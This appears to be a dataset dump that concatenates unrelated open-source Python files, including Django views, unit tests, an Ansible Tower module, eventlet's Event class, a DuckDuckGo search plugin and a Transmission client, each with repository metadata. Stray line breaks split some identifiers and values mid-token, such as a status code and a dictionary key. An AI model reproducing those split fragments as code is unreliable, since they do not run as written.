    url(r'^password-reset/confirm/(?P<uidb64>[-\w]+)/(?P<token>[-\w]+)/$', view=password_reset_confirm, name='password_reset_confirm'),
    url(r'^password-reset/complete/$', view=password_reset_complete, name='password_reset_complete'),
]
tmtowtdi/MontyLacuna
lib/lacuna/buildings/boring/fission.py
Python
mit
219
0.031963
from lacuna.building import MyBuilding

class fission(MyBuilding):
    path = 'fission'

    def __init__( self, client, body_id:int = 0, building_id:int = 0 ):
        super().__init__( client, body_id, building_id )
fingeronthebutton/RIDE
utest/controller/test_tablecontrollers.py
Python
apache-2.0
2,586
0.004254
import unittest

from nose.tools import assert_equals
from robotide.robotapi import TestCaseFile, TestCaseFileSettingTable
from robotide.controller.filecontrollers import TestCaseFileController
from robotide.controller.tablecontrollers import ImportSettingsController

VALID_NAME = 'Valid name'

class TestCaseNameValidationTest(unittest.TestCase):

    def setUp(self):
        self.ctrl = TestCaseFileController(TestCaseFile()).tests

    def test_valid_name(self):
        self._validate_name(VALID_NAME, True)

    def test_empty_name(self):
        self._validate_name('', False)

    def test_name_with_only_whitespace(self):
        self._validate_name('   ', False)

    def test_duplicate_name(self):
        self.ctrl.new(VALID_NAME)
        self._validate_name(VALID_NAME, False)
        self._validate_name(VALID_NAME.upper(), False)
        self._validate_name(VALID_NAME.replace(' ', '_'), False)

    def test_duplicate_name_when_previous_name_known(self):
        ctrl = self.ctrl.new(VALID_NAME)
        self._validate_name(VALID_NAME, True, ctrl)
        self._validate_name(VALID_NAME.upper(), True, ctrl)
        self._validate_name(VALID_NAME.replace(' ', '_'), True, ctrl)

    def _validate_name(self, name, expected_valid, named_ctrl=None):
        valid = not bool(self.ctrl.validate_name(name, named_ctrl).error_message)
        assert_equals(valid, expected_valid)

class TestCaseCreationTest(unittest.TestCase):

    def setUp(self):
        self.ctrl = TestCaseFileController(TestCaseFile()).tests

    def test_whitespace_is_stripped(self):
        test = self.ctrl.new('   ' + VALID_NAME + '\t   \n')
        assert_equals(test.name, VALID_NAME)

class LibraryImportListOperationsTest(unittest.TestCase):

    def setUp(self):
        self._parent = lambda:0
        self._parent.mark_dirty = lambda:0
        self._parent.datafile_controller = self._parent
        self._parent.update_namespace = lambda:0
        self._table = TestCaseFileSettingTable(lambda:0)
        self.ctrl = ImportSettingsController(self._parent, self._table)
        self._lib1 = self.ctrl.add_library('libbi1', '', '')
        self._lib2 = self.ctrl.add_library('libbi2', '', '')
        self.assertEqual([self._lib1.name, self._lib2.name], [l.name for l in self.ctrl])

    def test_move_up(self):
        self.ctrl.move_up(1)
        self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl])

    def test_move_down(self):
        self.ctrl.move_down(0)
        self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl])
HuaweiSwitch/ansible
lib/ansible/modules/web_infrastructure/ansible_tower/tower_job_launch.py
Python
gpl-3.0
4,901
0.000816
#!/usr/bin/python
# coding: utf-8 -*-

# (c) 2017, Wayne Witzel III <wayne@riotousliving.com>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.

ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = '''
---
module: tower_job_launch
author: "Wayne Witzel III (@wwitzel3)"
version_added: "2.3"
short_description: Launch an Ansible Job.
description:
    - Launch an Ansible Tower jobs. See
      U(https://www.ansible.com/tower) for an overview.
options:
    job_template:
      description:
        - Name of the job_template to use.
      required: True
    job_explanation:
      description:
        - Job explanation field.
      default: null
    job_type:
      description:
        - Job_type to use for the job, only used if prompt for job_type is set.
      choices: ["run", "check", "scan"]
      default: null
    inventory:
      description:
        - Inventory to use for the job, only used if prompt for inventory is set.
      default: null
    credential:
      description:
        - Credential to use for job, only used if prompt for credential is set.
      default: null
    extra_vars:
      description:
        - Extra_vars to use for the job_template. Use '@' for a file.
      default: null
    limit:
      description:
        - Limit to use for the job_template.
      default: null
    tags:
      description:
        - Specific tags to use for from playbook.
      default: null
    use_job_endpoint:
      description:
        - Disable launching jobs from job template.
      default: False
extends_documentation_fragment: tower
'''

EXAMPLES = '''
- name: Launch a job
  tower_job_launch:
    job_template: "My Job Template"
  register: job

- name: Wait for job max 120s
  tower_job_wait:
    job_id: job.id
    timeout: 120
'''

RETURN = '''
id:
    description: job id of the newly launched job
    returned: success
    type: int
    sample: 86
status:
    description: status of newly launched job
    returned: success
    type: string
    sample: pending
'''

from ansible.module_utils.basic import AnsibleModule

try:
    import tower_cli
    import tower_cli.utils.exceptions as exc

    from tower_cli.conf import settings
    from ansible.module_utils.ansible_tower import (
        tower_auth_config,
        tower_check_mode,
        tower_argument_spec,
    )

    HAS_TOWER_CLI = True
except ImportError:
    HAS_TOWER_CLI = False


def main():
    argument_spec = tower_argument_spec()
    argument_spec.update(dict(
        job_template=dict(required=True),
        job_type=dict(choices=['run', 'check', 'scan']),
        inventory=dict(),
        credential=dict(),
        limit=dict(),
        tags=dict(type='list'),
        extra_vars=dict(type='list'),
    ))

    module = AnsibleModule(
        argument_spec,
        supports_check_mode=True
    )

    if not HAS_TOWER_CLI:
        module.fail_json(msg='ansible-tower-cli required for this module')

    json_output = {}
    tags = module.params.get('tags')

    tower_auth = tower_auth_config(module)
    with settings.runtime_values(**tower_auth):
        tower_check_mode(module)
        try:
            params = module.params.copy()
            if isinstance(tags, list):
                params['tags'] = ','.join(tags)
            job = tower_cli.get_resource('job')

            lookup_fields = ('job_template', 'inventory', 'credential')
            for field in lookup_fields:
                try:
                    name = params.pop(field)
                    result = tower_cli.get_resource(field).get(name=name)
                    params[field] = result['id']
                except exc.NotFound as excinfo:
                    module.fail_json(msg='Unable to launch job, {0}/{1} was not found: {2}'.format(field, name, excinfo), changed=False)

            result = job.launch(no_input=True, **params)
            json_output['id'] = result['id']
            json_output['status'] = result['status']
        except (exc.ConnectionError, exc.BadRequest) as excinfo:
            module.fail_json(msg='Unable to launch job: {0}'.format(excinfo), changed=False)

    json_output['changed'] = result['changed']
    module.exit_json(**json_output)


if __name__ == '__main__':
    main()
kobox/achilles.pl
src/static/fm/views.py
Python
mit
4,377
0.000457
# coding: utf-8
from django.views.generic import CreateView, UpdateView, DeleteView
from django.http import HttpResponse, HttpResponseRedirect
from django.template.loader import render_to_string
from django.template import RequestContext
from django.core.serializers.json import DjangoJSONEncoder
from django.conf import settings

try:
    import json
except ImportError:
    from django.utils import simplejson as json


class JSONResponseMixin(object):
    """
    This is a slightly modified version from django-braces project
    (https://github.com/brack3t/django-braces)
    """
    content_type = None
    json_dumps_kwargs = None

    def get_content_type(self):
        return self.content_type or u"application/json"

    def get_json_dumps_kwargs(self):
        if self.json_dumps_kwargs is None:
            self.json_dumps_kwargs = {}
        self.json_dumps_kwargs.setdefault(u'ensure_ascii', False)
        return self.json_dumps_kwargs

    def render_json_response(self, context_dict, status=200):
        """
        Limited serialization for shipping plain data.
        Do not use for models or other complex or custom objects.
        """
        json_context = json.dumps(
            context_dict,
            cls=DjangoJSONEncoder,
            **self.get_json_dumps_kwargs()
        ).encode(u'utf-8')
        return HttpResponse(
            json_context,
            content_type=self.get_content_type(),
            status=status
        )


class AjaxFormMixin(JSONResponseMixin):
    message_template = None

    def pre_save(self):
        pass

    def post_save(self):
        pass

    def form_valid(self, form):
        """
        If the request is ajax, save the form and return a json response.
        Otherwise return super as expected.
        """
        self.object = form.save(commit=False)
        self.pre_save()
        self.object.save()
        if hasattr(form, 'save_m2m'):
            form.save_m2m()
        self.post_save()

        if self.request.is_ajax():
            return self.render_json_response(self.get_success_result())
        return HttpResponseRedirect(self.get_success_url())

    def form_invalid(self, form):
        """
        We have errors in the form. If ajax, return them as json.
        Otherwise, proceed as normal.
        """
        if self.request.is_ajax():
            return self.render_json_response(self.get_error_result(form))
        return super(AjaxFormMixin, self).form_invalid(form)

    def get_message_template_context(self):
        return {
            'instance': self.object,
            'object': self.object
        }

    def get_message_template_html(self):
        return render_to_string(
            self.message_template,
            self.get_message_template_context(),
            context_instance=RequestContext(self.request)
        )

    def get_response_message(self):
        message = ''
        if self.message_template:
            message = self.get_message_template_html()
        return message

    def get_success_result(self):
        return {'status': 'ok', 'message': self.get_response_message()}

    def get_error_result(self, form):
        html = render_to_string(
            self.template_name,
            self.get_context_data(form=form),
            context_instance=RequestContext(self.request)
        )
        return {'status': 'error', 'message': html}


DEFAULT_FORM_TEMPLATE = getattr(settings, "FM_DEFAULT_FORM_TEMPLATE", "fm/form.html")


class AjaxCreateView(AjaxFormMixin, CreateView):
    template_name = DEFAULT_FORM_TEMPLATE


class AjaxUpdateView(AjaxFormMixin, UpdateView):
    template_name = DEFAULT_FORM_TEMPLATE


class AjaxDeleteView(JSONResponseMixin, DeleteView):

    def pre_delete(self):
        pass

    def post_delete(self):
        pass

    def get_success_result(self):
        return {'status': 'ok'}

    def delete(self, request, *args, **kwargs):
        """
        The same logic as in DeleteView but some hooks and JSON response
        in case of AJAX request
        """
        self.object = self.get_object()
        self.pre_delete()
        self.object.delete()
        self.post_delete()
        if self.request.is_ajax():
            return self.render_json_response(self.get_success_result())
        success_url = self.get_success_url()
        return HttpResponseRedirect(success_url)
LoRexxar/Cobra-W
web/index/apps.py
Python
mit
89
0
from django.apps import AppConfig


class IndexConfig(AppConfig):
    name = 'web.index'
Evfro/fifty-shades
polara/tools/movielens.py
Python
mit
2,538
0.006304
import pandas as pd
from requests import get
from StringIO import StringIO
from pandas.io.common import ZipFile

def get_movielens_data(local_file=None, get_genres=False):
    '''Downloads movielens data and stores it in pandas dataframe.
    '''
    if not local_file:
        #print 'Downloading data...'
        zip_file_url = 'http://files.grouplens.org/datasets/movielens/ml-1m.zip'
        zip_response = get(zip_file_url)
        zip_contents = StringIO(zip_response.content)
        #print 'Done.'
    else:
        zip_contents = local_file

    #print 'Loading data into memory...'
    with ZipFile(zip_contents) as zfile:
        zip_files = pd.Series(zfile.namelist())
        zip_file = zip_files[zip_files.str.contains('ratings')].iat[0]
        zdata = zfile.read(zip_file)
        if 'latest' in zip_file:
            header = 0
        else:
            header = None
        delimiter = ','
        zdata = zdata.replace('::', delimiter)  # makes data compatible with pandas c-engine
        ml_data = pd.read_csv(StringIO(zdata), sep=delimiter, header=header, engine='c',
                              names=['userid', 'movieid', 'rating', 'timestamp'],
                              usecols=['userid', 'movieid', 'rating'])

        if get_genres:
            zip_file = zip_files[zip_files.str.contains('movies')].iat[0]
            with zfile.open(zip_file) as zdata:
                if 'latest' in zip_file:
                    delimiter = ','
                else:
                    delimiter = '::'
                genres_data = pd.read_csv(zdata, sep=delimiter, header=header, engine='python',
                                          names=['movieid', 'movienm', 'genres'])
            ml_genres = split_genres(genres_data)
            ml_data = (ml_data, ml_genres)

    return ml_data

def split_genres(genres_data):
    genres_data.index.name = 'movie_idx'
    genres_stacked = genres_data.genres.str.split('|', expand=True).stack().to_frame('genreid')
    ml_genres = genres_data[['movieid', 'movienm']].join(genres_stacked).reset_index(drop=True)
    return ml_genres

def filter_short_head(data, threshold=0.01):
    short_head = data.groupby('movieid', sort=False)['userid'].nunique()
    short_head.sort_values(ascending=False, inplace=True)

    ratings_perc = short_head.cumsum()*1.0/short_head.sum()
    movies_perc = pd.np.arange(1, len(short_head)+1, dtype=pd.np.float64) / len(short_head)

    long_tail_movies = ratings_perc[movies_perc > threshold].index
    return long_tail_movies
BambooHR/rapid
rapid/master/controllers/api/upgrade_controller.py
Python
apache-2.0
1,295
0.002317
""" Copyright (c) 2015 Michael Bright and Bamboo HR LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from flask import Response from rapid.lib.version import Version from rapid.lib import api_key_required from rapid.lib.utils import UpgradeUtil class UpgradeController(object): def __init__(self, flask_app): self.flask_app = flask_app def configure_routing(self): self.flask_app.add_url_rule('/api/upgrade/<path:version>', 'upgrade_master', api_key_required(self.upgrade_master), methods=['POST']) def upgrade_master(self, version
): worked = UpgradeUtil.upgrade_version(version, self.flask_app.rapid_config) return Response("It worked!" if worked else "It didn't work, version {} restored!".format(Version.get_version()), status=200 if worked else 5
05)
Secretmapper/updevcamp-session-2-dist
form/cgi-bin/lectures/simple/python.py
Python
mit
272
0
#!/usr/local/bin/python3

import cgi

print("Content-type: text/html")
print('''
<!DOCTYPE html>

<html>
  <head>
    <title>Python</title>
  </head>
  <body>
    <h1>Python</h1>
    <p>Python</p>
    <p>This is the article for Python</p>
  </body>
</html>
''')
openstack/oslo.service
oslo_service/tests/test_systemd.py
Python
apache-2.0
2,580
0
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import os
import socket
from unittest import mock

from oslotest import base as test_base

from oslo_service import systemd


class SystemdTestCase(test_base.BaseTestCase):
    """Test case for Systemd service readiness."""

    def test__abstractify(self):
        sock_name = '@fake_socket'
        res = systemd._abstractify(sock_name)
        self.assertEqual('\0{0}'.format(sock_name[1:]), res)

    @mock.patch.object(os, 'getenv', return_value='@fake_socket')
    def _test__sd_notify(self, getenv_mock, unset_env=False):
        self.ready = False
        self.closed = False

        class FakeSocket(object):
            def __init__(self, family, type):
                pass

            def connect(fs, socket):
                pass

            def close(fs):
                self.closed = True

            def sendall(fs, data):
                if data == b'READY=1':
                    self.ready = True

        with mock.patch.object(socket, 'socket', new=FakeSocket):
            if unset_env:
                systemd.notify_once()
            else:
                systemd.notify()

            self.assertTrue(self.ready)
            self.assertTrue(self.closed)

    def test_notify(self):
        self._test__sd_notify()

    def test_notify_once(self):
        os.environ['NOTIFY_SOCKET'] = '@fake_socket'
        self._test__sd_notify(unset_env=True)
        self.assertRaises(KeyError, os.environ.__getitem__, 'NOTIFY_SOCKET')

    @mock.patch("socket.socket")
    def test_onready(self, sock_mock):
        recv_results = [b'READY=1', '', socket.timeout]
        expected_results = [0, 1, 2]
        for recv, expected in zip(recv_results, expected_results):
            if recv == socket.timeout:
                sock_mock.return_value.recv.side_effect = recv
            else:
                sock_mock.return_value.recv.return_value = recv
            actual = systemd.onready('@fake_socket', 1)
            self.assertEqual(expected, actual)
sbadia/pkg-python-eventlet
eventlet/event.py
Python
mit
7,095
0.000423
from __future__ import print_function

from eventlet import hubs
from eventlet.support import greenlets as greenlet

__all__ = ['Event']


class NOT_USED:
    def __repr__(self):
        return 'NOT_USED'

NOT_USED = NOT_USED()


class Event(object):
    """An abstraction where an arbitrary number of coroutines
    can wait for one event from another.

    Events are similar to a Queue that can only hold one item, but differ
    in two important ways:

    1. calling :meth:`send` never unschedules the current greenthread
    2. :meth:`send` can only be called once; create a new event to send again.

    They are good for communicating results between coroutines, and
    are the basis for how
    :meth:`GreenThread.wait() <eventlet.greenthread.GreenThread.wait>`
    is implemented.

    >>> from eventlet import event
    >>> import eventlet
    >>> evt = event.Event()
    >>> def baz(b):
    ...     evt.send(b + 1)
    ...
    >>> _ = eventlet.spawn_n(baz, 3)
    >>> evt.wait()
    4
    """
    _result = None
    _exc = None

    def __init__(self):
        self._waiters = set()
        self.reset()

    def __str__(self):
        params = (self.__class__.__name__, hex(id(self)),
                  self._result, self._exc, len(self._waiters))
        return '<%s at %s result=%r _exc=%r _waiters[%d]>' % params

    def reset(self):
        # this is kind of a misfeature and doesn't work perfectly well,
        # it's better to create a new event rather than reset an old one
        # removing documentation so that we don't get new use cases for it
        assert self._result is not NOT_USED, 'Trying to re-reset() a fresh event.'
        self._result = NOT_USED
        self._exc = None

    def ready(self):
        """ Return true if the :meth:`wait` call will return immediately.
        Used to avoid waiting for things that might take a while to time out.
        For example, you can put a bunch of events into a list, and then visit
        them all repeatedly, calling :meth:`ready` until one returns ``True``,
        and then you can :meth:`wait` on that one."""
        return self._result is not NOT_USED

    def has_exception(self):
        return self._exc is not None

    def has_result(self):
        return self._result is not NOT_USED and self._exc is None

    def poll(self, notready=None):
        if self.ready():
            return self.wait()
        return notready

    # QQQ make it return tuple (type, value, tb) instead of raising
    # because
    # 1) "poll" does not imply raising
    # 2) it's better not to screw up caller's sys.exc_info() by default
    #    (e.g. if caller wants to calls the function in except or finally)
    def poll_exception(self, notready=None):
        if self.has_exception():
            return self.wait()
        return notready

    def poll_result(self, notready=None):
        if self.has_result():
            return self.wait()
        return notready

    def wait(self):
        """Wait until another coroutine calls :meth:`send`.
        Returns the value the other coroutine passed to :meth:`send`.

        >>> from eventlet import event
        >>> import eventlet
        >>> evt = event.Event()
        >>> def wait_on():
        ...    retval = evt.wait()
        ...    print("waited for {0}".format(retval))
        >>> _ = eventlet.spawn(wait_on)
        >>> evt.send('result')
        >>> eventlet.sleep(0)
        waited for result

        Returns immediately if the event has already occured.

        >>> evt.wait()
        'result'
        """
        current = greenlet.getcurrent()
        if self._result is NOT_USED:
            self._waiters.add(current)
            try:
                return hubs.get_hub().switch()
            finally:
                self._waiters.discard(current)
        if self._exc is not None:
            current.throw(*self._exc)
        return self._result

    def send(self, result=None, exc=None):
        """Makes arrangements for the waiters to be woken with the
        result and then returns immediately to the parent.

        >>> from eventlet import event
        >>> import eventlet
        >>> evt = event.Event()
        >>> def waiter():
        ...     print('about to wait')
        ...     result = evt.wait()
        ...     print('waited for {0}'.format(result))
        >>> _ = eventlet.spawn(waiter)
        >>> eventlet.sleep(0)
        about to wait
        >>> evt.send('a')
        >>> eventlet.sleep(0)
        waited for a

        It is an error to call :meth:`send` multiple times on the same event.

        >>> evt.send('whoops')
        Traceback (most recent call last):
        ...
        AssertionError: Trying to re-send() an already-triggered event.

        Use :meth:`reset` between :meth:`send` s to reuse an event object.
        """
        assert self._result is NOT_USED, 'Trying to re-send() an already-triggered event.'
        self._result = result
        if exc is not None and not isinstance(exc, tuple):
            exc = (exc, )
        self._exc = exc
        hub = hubs.get_hub()
        for waiter in self._waiters:
            hub.schedule_call_global(
                0, self._do_send, self._result, self._exc, waiter)

    def _do_send(self, result, exc, waiter):
        if waiter in self._waiters:
            if exc is None:
                waiter.switch(result)
            else:
                waiter.throw(*exc)

    def send_exception(self, *args):
        """Same as :meth:`send`, but sends an exception to waiters.

        The arguments to send_exception are the same as the arguments
        to ``raise``.  If a single exception object is passed in, it
        will be re-raised when :meth:`wait` is called, generating a
        new stacktrace.

           >>> from eventlet import event
           >>> evt = event.Event()
           >>> evt.send_exception(RuntimeError())
           >>> evt.wait()
           Traceback (most recent call last):
             File "<stdin>", line 1, in <module>
             File "eventlet/event.py", line 120, in wait
               current.throw(*self._exc)
           RuntimeError

        If it's important to preserve the entire original stack trace,
        you must pass in the entire :func:`sys.exc_info` tuple.

           >>> import sys
           >>> evt = event.Event()
           >>> try:
           ...     raise RuntimeError()
           ... except RuntimeError:
           ...     evt.send_exception(*sys.exc_info())
           ...
           >>> evt.wait()
           Traceback (most recent call last):
             File "<stdin>", line 1, in <module>
             File "eventlet/event.py", line 120, in wait
               current.throw(*self._exc)
             File "<stdin>", line 2, in <module>
           RuntimeError

        Note that doing so stores a traceback object directly on the
        Event object, which may cause reference cycles. See the
        :func:`sys.exc_info` documentation.
        """
        # the arguments and the same as for greenlet.throw
        return self.send(None, args)
canvasnetworks/canvas
website/drawquest/economy.py
Python
bsd-3-clause
1,765
0.007365
from canvas.exceptions import ServiceError, ValidationError
from canvas.economy import InvalidPurchase
from drawquest import knobs
from drawquest.apps.palettes.models import get_palette_by_name, all_palettes
from drawquest.signals import balance_changed

def balance(user):
    return int(user.kv.stickers.currency.get() or 0)

def _adjust_balance(user, amount):
    if amount >= 0:
        user.kv.stickers.currency.increment(amount)
    else:
        result = user.kv.stickers.currency.increment_ifsufficient(amount)
        if not result['success']:
            raise InvalidPurchase("Insufficient balance.")
    balance_changed.send(None, user=user)
    publish_balance(user)

def publish_balance(user):
    user.redis.coin_channel.publish({'balance': balance(user)})

def credit(user, amount):
    _adjust_balance(user, amount)

def debit(user, amount):
    _adjust_balance(user, -amount)

def credit_first_quest(user):
    credit(user, knobs.REWARDS['first_quest'])

def credit_quest_of_the_day_completion(user):
    credit(user, knobs.REWARDS['quest_of_the_day'])

def credit_archived_quest_completion(user):
    credit(user, knobs.REWARDS['archived_quest'])

def credit_personal_share(user):
    credit(user, knobs.REWARDS['personal_share'])

def credit_streak(user, streak):
    credit(user, knobs.REWARDS['streak_{}'.format(streak)])

def credit_star(user):
    user.kv.stickers_received.increment(1)
    credit(user, knobs.REWARDS['star'])

def purchase_palette(user, palette):
    if isinstance(palette, basestring):
        palette = get_palette_by_name(palette)

    if palette in user.redis.palettes:
        raise InvalidPurchase("You've already bought this palette.")

    debit(user, palette.cost)
    user.redis.palettes.unlock(palette)
daboross/cardapio
src/plugins/duckduck.py
Python
gpl-3.0
8,409
0.002259
# # Copyright (C) 2010 Cardapio Team (tvst@hotmail.com) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ## Duck Duck Go search plugin by Clifton Mulkey ## Adapted from the Google Search plugin class CardapioPlugin(CardapioPluginInterface): author = _('Cardapio Team') name = _('DuckDuckGo') description = _('Perform quick DuckDuckGo searches') url = '' help_text = '' version = '1.0' plugin_api_version = 1.40 search_delay_type = 'remote' default_keyword = 'duck' category_name = _('DuckDuckGo Results') category_icon = 'system-search' icon = 'system-search' category_tooltip = _('Results found with DuckDuckGo') hide_from_sidebar = True def __init__(self, cardapio_proxy, category): self.c = cardapio_proxy try: from gio import File, Cancellable from urllib2 import quote from simplejson import loads from locale import getdefaultlocale from glib import GError except Exception, exception: self.c.write_to_log(self, 'Could not import certain modules', is_error=True) self.c.write_to_log(self, exception, is_error=True) self.loaded = False return self.File = File self.Cancellable = Cancellable self.quote = quote self.loads = loads self.getdefaultlocale = getdefaultlocale self.GError = GError self.query_url = r'http://www.duckduckgo.com/?q={0}&o=json' self.search_controller = self.Cancellable() self.action_command = "xdg-open 'http://duckduckgo.com/?q=%s'" self.action = { 'name': _('Show additional results'), 'tooltip': _('Show additional search results in your web browser'), 'icon name': 'system-search', 'type': 'callback', 'command': self.more_results_action, 'context menu': None, } self.loaded = True def search(self, text, result_limit): # TODO: I'm sure this is not the best way of doing remote procedure # calls, but I can't seem to find anything that is this easy to use and # compatible with gtk. Argh :( # TODO: we should really check if there's an internet connection before # proceeding... self.current_query = text text = self.quote(str(text)) # Is there a way to get the result_limit in the init method # so we don't have to assign it everytime search is called? self.result_limit = result_limit query = self.query_url.format(text) self.stream = self.File(query) self.search_controller.reset() self.stream.load_contents_async(self.handle_search_result, cancellable=self.search_controller) def cancel(self): if not self.search_controller.is_cancelled(): self.search_controller.cancel() def handle_search_result(self, gdaemonfile=None, response=None): # This function parses the results from the query # The results returned from DDG are a little convoluted # so we have to check for many different types of results here result_count = 0; try: response = self.stream.load_contents_finish(response)[0] except self.GError, e: # no need to worry if there's no response: maybe there's no internet # connection... 
self.c.handle_search_error(self, 'no response') return raw_results = self.loads(response) # print raw_results parsed_results = [] if 'Error' in raw_results: self.c.handle_search_error(self, raw_results['Error']) return # check for an abstract section try: if raw_results['Abstract']: item = { 'name': raw_results['Heading'], 'tooltip': '(%s) %s' % (raw_results['AbstractSource'], raw_results['AbstractText']), 'icon name': 'text-html', 'type': 'xdg', 'command': raw_results['AbstractURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for a definition section try: if raw_results['Definition']: item = { 'name': '%s (Definition)' % raw_results['Heading'], 'tooltip': '(%s) %s' % (raw_results['DefinitionSource'], raw_results['Definition']), 'icon name': 'text-html', 'type': 'xdg', 'command': raw_results['DefinitionU
RL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for a related topics section try: if raw_results['RelatedTopics']: for raw_result in raw_results['RelatedTopics']: if result_count >= self.result_limit: break #some related topics have a
'Topics' sub list try: for result in raw_result['Topics']: if result_count >= self.result_limit: break item = { 'name': result['Text'], 'tooltip': result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: #otherwise the RelatedTopic is a single entry item = { 'name': raw_result['Text'], 'tooltip': raw_result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': raw_result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for external results section try: if raw_results['Results']: for raw_result in raw_results['Results']: if result_count >= self.result_limit: break item = { 'name': raw_result['Text'], 'tooltip': raw_result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': raw_result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass if parsed_results: parsed_results.append(self.action) self.c.handle_search_result(self, parsed_results, self.current_query) def more_results_action(self, text): text = text.replace("'", r"\'") text = text.replace('"', r'\"') try:
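For readers who want to poke at the same endpoint outside Cardapio, here is a minimal synchronous sketch of the query the plugin issues asynchronously through gio; it is written for Python 3, reads only the response fields the plugin itself uses, and assumes the `o=json` endpoint still answers as it did when the plugin was written.

import json
from urllib.parse import quote
from urllib.request import urlopen

def duck_search(text):
    # same query string the plugin builds in self.query_url
    url = 'http://www.duckduckgo.com/?q={0}&o=json'.format(quote(text))
    with urlopen(url) as resp:
        raw = json.loads(resp.read().decode('utf-8'))
    results = []
    if raw.get('Abstract'):
        results.append((raw['Heading'], raw['AbstractURL']))
    for topic in raw.get('RelatedTopics', []):
        if 'Text' in topic:  # 'Topics' sub-lists are flattened by the plugin; skipped here
            results.append((topic['Text'], topic['FirstURL']))
    return results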
Elandril/SickRage
sickbeard/clients/transmission_client.py
Python
gpl-3.0
5,249
0.00362
# Author: Mr_Orange <mr_orange@hotmail.it> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. import re import json from base64 import b64encode import sickbeard from .generic import GenericClient class TransmissionAPI(GenericClient): def __init__(self, host=None, username=None, password=None): super(TransmissionAPI, self).__init__('Transmission', host, username, password) if not self.host.endswith('/'): self.host = self.host + '/' if self.rpcurl.startswith('/'): self.rpcurl = self.rpcurl[1:] if self.rpcurl.endswith('/'): self.rpcurl = self.rpcurl[:-1] self.url = self.host + self.rpcurl + '/rpc' def _get_auth(self): post_data = json.dumps({'method': 'session-get', }) try: self.response = self.session.post(self.url, data=post_data.encode('utf-8'), timeout=120, verify=sickbeard.TORRENT_VERIFY_CERT) self.auth = re.search('X-Transmission-Session-Id:\s*(\w+)', self.response.text).group(1) except: return None self.session.headers.update({'x-transmission-session-id': self.auth}) #Validating Transmission authorization post_data = json.dumps({'arguments': {}, 'method': 'session-get', }) self._request(method='post', data=post_data) return self.auth def _add_torrent_uri(self, result): arguments = {'filename': result.url, 'paused': 1 if sickbeard.TORRENT_PAUSED else 0, 'download-dir': sickbeard.TORRENT_PATH } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-add', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _add_torrent_file(self, result): arguments = {'metainfo': b64encode(result.content), 'paused': 1 if sickbeard.TORRENT_PAUSED else 0
, 'download-dir': sickbeard.TORRENT_PATH } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-add', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _set_torrent_ratio(self, result): ratio = No
